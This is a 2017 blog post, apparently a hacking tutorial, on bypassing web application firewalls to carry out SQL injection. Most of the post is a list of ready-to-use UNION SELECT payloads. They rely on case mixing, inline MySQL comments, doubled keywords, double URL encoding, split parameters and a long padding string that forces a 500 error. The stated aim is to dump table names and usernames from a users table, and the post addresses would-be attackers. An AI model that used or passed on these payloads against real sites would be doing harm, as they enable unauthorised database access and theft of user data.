Sunday, May 28, 2017

Waf & Waf Bypassing



Let’s explain firstly what WaF stands for and what it actually does for a website / server.
Waf is short for: Web Application Firewall, its purpose is to filter out a lot of our queries characters.

An example of a normal website we would inject on would look like:
www.exmample.com/page.php?id=1 and 1=0 union all select 1,2,3,4,5--

If we do that with a WAF protected website will we get thrown out with a 403 FORBIDDEN error, or the 404 not found error.

Now that you know what a WAF is and what it does, I will show you some tip’s / tricks to bypass it.

Comments used to bypass:
·         //
·         -- 
·         /**/
·         #
·         --+
·         -- -
·         ;
·         -- a
Now for bypassing some WaFs, the exploiting is quite similar to basic SQL injection, yet you have filters now that you have to bypass, here are a few queries that CAN bypass (It’s never 100%).
·         page.php?id=1/*!UnIoN*/SeLeCT (In this case we use /! As they are used as inline MySQL comments (sort of php like) and we work with lower case and upper case letters to bypass it as well).
·         page.php?id=1+UNIunionON+SeLselectECT+1,2,3,4,5— (In this case we use the double text, its seems rather weird but what it does, if a filter detects the union select, and the filter has preg_replace(php function) to replace our union select with a space (or nothing), it will still show like:
UNION SELECT 1,2,3,4,5--
·         page.php?id=1%252f%252a*/UNION%252f%252a /SELECT (In this case we are using HTTP encoding (hence the %252f etc signs, to DOUBLE bypass certain WAF’S (this method works only on 10-15% of the sites I’ve personally tested on))).
Putting it all together:www.exmample.com/page.php?id=1 /*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables--

Which will result showing all the table names, just as Chapter 1.
The rest of the exploiting you have to figure out yourself, I gave you the handles for WAF bypassing, a hacker has to do everything on his own to really master / learn something they want, all this does is tickle your brain.
Tips & Trick bypassing more:
1.       id=1+(UnIoN)+(SelECT)+
2.       id=1+(UnIoN+SeLeCT)+
3.       id=1+(UnI)(oN)+(SeL)(EcT)
4.  id=1+'UnI''On'+'SeL''ECT'
5.  id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6.       id=1+UnIoN+SeLecT 1,2,3—
7.       id=1+UnIOn/**/SeLect 1,2,3—
8.       id=1+UNIunionON+SELselectECT 1,2,3—
9.       id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10.   id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
11.id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12.id=1+un/**/ion+sel/**/ect+1,2,3--
13.id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14.id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15.   id=1+/**/union/*&id=*/select/*&id=*/1,2,3--

It’s only important to use these queries as weird as they look right now at the start of the query, meaning, the rest of the query you could try normal like:
www.example.com/page.php?id=1 id=1+(UnIoN)+(SelECT)+1,2,username,4,5 from users--









The unknown 500 server error bypass.
A lot of you might not know that 500 server errors fall under WAF bypassing, it’s simply a technique used, we will use a certain amount of characters to bypass the filters.
Example:
index.php?id=-1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) /*!UNION*/ /*!SELECT*//**/1,2,3,4,5,6—x
n  The query looks quite big, the A = 1000x, to bypass common filters

No comments: